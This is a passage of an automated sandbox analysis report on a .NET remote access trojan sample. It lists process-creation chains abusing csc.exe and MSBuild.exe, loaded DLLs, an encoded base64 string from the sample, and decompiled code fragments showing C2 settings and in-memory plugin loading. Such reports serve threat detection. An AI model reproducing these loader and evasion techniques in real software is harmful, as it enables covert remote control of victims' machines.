            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, GetPool.csBase64 encoded string: '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
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/7@1/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\gacnbEslqeOBsJtH
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeFile created: C:\Users\user\AppData\Local\Temp\p5qmaywtJump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeVirustotal: Detection: 48%
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20EF.tmp" "c:\Users\user\AppData\Local\Temp\p5qmaywt\CSC46F8F09A99C548C6BA2229A8BF601D.TMP"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20EF.tmp" "c:\Users\user\AppData\Local\Temp\p5qmaywt\CSC46F8F09A99C548C6BA2229A8BF601D.TMP"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.pdb source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.pdb source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe, 00000000.00000002.1203287208.0000000000994000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.cs.Net Code: Memory
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, Messages.cs.Net Code: Memory
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.2.raw.unpack, Messages.cs.Net Code: Memory
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.0.raw.unpack, Messages.cs.Net Code: Memory
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 1.3.csc.exe.586d4b0.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeStatic PE information: 0x9F3629AB [Sun Aug 23 19:42:35 2054 UTC]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_02E57DA0 push eax; iretd 5_2_02E57DA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
